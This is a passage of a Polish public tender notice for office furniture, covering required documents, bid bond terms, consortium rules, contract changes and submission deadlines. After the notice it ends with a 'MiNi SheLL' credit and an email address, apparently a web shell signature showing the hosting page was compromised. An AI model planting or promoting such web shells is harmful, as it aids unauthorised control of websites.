Wykonawcy; w przypadku <br/>świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje <br/>bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być <br/>wystawione w okresie ostatnich 3 miesięcy <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2. Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz braku podstaw do wykluczenia (Oświadczenie wstępne) – dokument tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe – Załącznik 3.0. do SWZ.;<br/><br/>3. Aktualne na dzień składania ofert Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dotyczące usług które wykonają poszczególni Wykonawcy – zgodnie z Załącznikiem 4.0. do SWZ, (jeśli dotyczy).<br/><br/>4. Aktualne na dzień składania ofert Oświadczenie i zobowiązanie podmiotu <br/>udostępniającego zasoby – zgodnie z Załącznikiem 5.0. do SWZ, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie w jakim Wykonawca powołuje się (w Formularzu ofertowym) na jego zasoby (jeśli dotyczy).<br/><br/>5. Odpis lub informacje z Krajowego Rejestru Sądowego i/lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania; <br/><br/>5.1. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w ust. 5., jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych <br/>i ogólnodostępnych baz danych, o ile Wykonawca wskazał w Formularzu ofertowym dane umożliwiające dostęp do tych dokumentów;<br/><br/>6. Pełnomocnictwo/a lub inny/e dokument/y potwierdzającego/ce umocowanie do reprezentowania Wykonawcy (jeśli dotyczy).<br/><br/>6.1. w przypadku Wykonawców składających wspólną ofertę, do oferty należy dołączyć pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (wystawione zgodnie z art. 58 ust. 2 Ustawy). Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony (zakres umocowania);<br/><br/>6.2. jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego <br/>reprezentowania nie wynika z dokumentów, o których mowa w ust. 5., Zamawiający zażąda od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy.<br/><br/>7.	Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w art. 125 ust. 1 uPzp, w zakresie braku podstaw wykluczenia z postępowania, wskazanych przez Zamawiającego (WZÓR) – Załącznik 8.0. do SWZ.<br/><br/>8.	Oświadczenia, aktualnego na dzień składania ofert, składanego na podstawie przepisów wskazanych w art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego dla: <br/>•	Wykonawcy - (WZÓR) – Załącznik 3.1. do SWZ; <br/>•	Wykonawców składających oferty wspólne (jeśli dotyczy) - (WZÓR) – <br/> Załącznik 3.1. do SWZ; <br/>•	podmiotów udostępniających Wykonawcy zasoby (jeśli dotyczy) - <br/> (WZÓR) – Załącznik 3.1. do SWZ. <br/><br/>9. Potwierdzenia złożenia wadium<br/><br/>10. Uzasadnienie zastrzeżenia informacji stanowiących tajemnicę przedsiębiorstwa, zgodnie z Działem XI ust. 6. (jeśli dotyczy)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca przedstawi wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 2 zadania, każde o wartości dla Części 1 min. 50 000 zł. brutto, dla Części 2 min. 30 000 zł. brutto, każde na podstawie odrębnej umowy, każde na podstawie odrębnej umowy, zgodnych z przedmiotem niniejszego zamówienia, polegających na <br/>wykonaniu, dostawie i montażu mebli biurowych, wraz z podaniem ich <br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy <br/>zostały wykonane lub są wykonywane, oraz załączeniem dowodów <br/>określających, czy te dostawy zostały wykonane lub są wykonywane <br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne <br/>dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi <br/>zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych <br/>są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest <br/>w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku <br/>świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje <br/>bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być <br/>wystawione w okresie ostatnich 3 miesięcy</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz ofertowy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do wniesienia wadium w wysokości:<br/>dla Części 1 - 2 500,00 zł., <br/>dla Części 1 - 1 500,00 zł.,<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>a. pieniądzu;<br/>b. gwarancjach bankowych;<br/>c. gwarancjach ubezpieczeniowych;<br/>d. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt <br/>2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego.<br/>nr rachunku: 20 1130 1017 0021 1001 5290 0004<br/>z podaniem tytułu przelewu: „wadium – nr sprawy: ZP.XXVII.261.10.2024”<br/><br/>UWAGA: W przypadku wniesienia wadium w pieniądzu Wykonawca składa wraz z ofertą dowód wniesienia wadium. Terminem wniesienia wadium jest data i dokładna godzina wpływu wadium na rachunek Zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 uPzp, jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>3. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, co najmniej jeden z członków konsorcjum musi samodzielnie spełniać warunek <br/>dotyczący posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>4. Sytuacja ekonomiczna lub finansowa – (nie dotyczy – Zamawiający nie określił warunku udziału w postępowaniu dot. sytuacji finansowej lub ekonomicznej) W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawca I/LUB co najmniej jeden z członków konsorcjum musi spełniać w warunek dotyczący sytuacji ekonomicznej lub finansowej (Zamawiający dopuszcza sumowanie).<br/>5. Zdolności techniczne lub zawodowe.<br/>W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawca LUB co najmniej jeden z członków konsorcjum musi samodzielnie spełniać w całości warunek dotyczący zdolności technicznej lub zawodowej (Zamawiający NIE dopuszcza sumowania).<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.<br/>7. Nie dopuszcza się uczestniczenia któregokolwiek z Wykonawców wspólnie ubiegających się o udzielnie zamówienia w więcej niż jednej grupie Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Niedopuszczalnym jest również złożenie przez któregokolwiek z <br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia, równocześnie oferty indywidualnej oraz w ramach grupy Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>8. Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wprowadzenie zmian treści umowy wymaga sporządzenia pod rygorem nieważności pisemnego aneksu. Zmiany te nie mogą naruszać postanowień art. 455 ustawy PZP.<br/>2.	Zamawiający na mocy art. 455 ust. 1 pkt 1 ustawy Pzp dopuszcza możliwość zmiany zawartej umowy, w zakresie:<br/>a) zmian regulacji prawnych obowiązujących w dniu podpisania umowy;<br/>b) przedłużenia terminu wykonania przedmiotu umowy na skutek zaistnienia okoliczności niezawinionych przez Wykonawcę, na wniosek Wykonawcy i za zgodą Zamawiającego; <br/>c) zmiany oferowanego produktu na inny o parametrach nie gorszych niż zaoferowane przez Wykonawcę w ofercie i spełniających wymagania zawarte w specyfikacji istotnych warunków zamówienia – w sytuacji, gdy Wykonawca wykaże, że zaproponowane przez niego w ofercie produkty nie są dostępne na rynku w wyniku zakończenia ich produkcji lub wycofania ze sprzedaży;<br/>d) w przypadkach określonych w art.455 ustawy Pzp.<br/>3.	Bez uprzedniej, pisemnej zgody Zamawiającego Wykonawcy nie przysługuje prawo przeniesienia wierzytelności, ani upoważnienia inkasowego wynikających z niniejszej umowy na osobę trzecią. <br/>4.	Wykonawca nie może powierzyć wykonania niniejszej umowy osobom trzecim bez zgody Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-29 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-65a7d93e-626f-422a-bf6d-77c24a237207</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-29 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com